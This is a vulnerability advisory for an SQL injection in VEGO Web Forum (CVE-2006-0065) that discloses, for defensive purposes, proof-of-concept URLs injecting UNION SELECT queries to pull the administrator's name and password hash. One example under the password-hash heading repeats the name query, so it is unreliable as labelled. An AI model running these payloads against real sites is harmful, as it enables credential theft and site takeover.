SQL Injection Vulnerability in VEGO Web Forum
Summary
- Vulnerability
- SQL Injection Vulnerability in VEGO Web Forum
- Discovered
- 2005.12.28
- Last Update
- 0 n/a
- ID
- EV0001
- CVE
- CVE-2006-0065
- Risk Level
- medium
- Type
- SQL Injection
- Status
- Unpatched
- Vendor
- VEGO (http://alas.matf.bg.ac.yu/~mr99067)
- Vulnerable Software
- VEGO Web Forum
- Version
- 1.26 and earlier
- PoC/Exploit
- Available
- Solution
- Not available
- Discovered by
- Aliaksandr Hartsuyeu (eVuln.com)
Description
SQL Injection found in VEGO Web Forum script.
Vulnerable scripts:
- php/functions.php
- php/functions_update.php
- php/functions_display.php
Variable theme_id isn't properly sanitized before being used in a SQL query. This can be used to make any SQL query by injecting arbitrary SQL code.
Administrator's authentication is threatened.
PoC/Exploit
Administrator's login name.
For version 1.26:
http://hostname/webforum/index.php? theme_id=-1%20union%20select%201,2,name,4,5%20from%20vwf_users%20where%20userid=1/*
Earlier versions:
http://hostname/temp/_1/webforum/index.php? theme_id=-1%20union%20select%201,2,name,4%20from%20vwf_users%20where%20userid=1/*
Hash of administrator's password.
For version 1.26:
http://hostname/webforum/index.php? theme_id=-1%20union%20select%201,2,name,4,5%20from%20vwf_users%20where%20userid=1/*
Earlier versions:
http://hostname/temp/_1/webforum/index.php? theme_id=-1%20union%20select%201,2,pass,4%20from%20vwf_users%20where%20userid=1/*
Solution.
Solution for "SQL Injection Vulnerability in VEGO Web Forum" is not available. Check VEGO website for updates.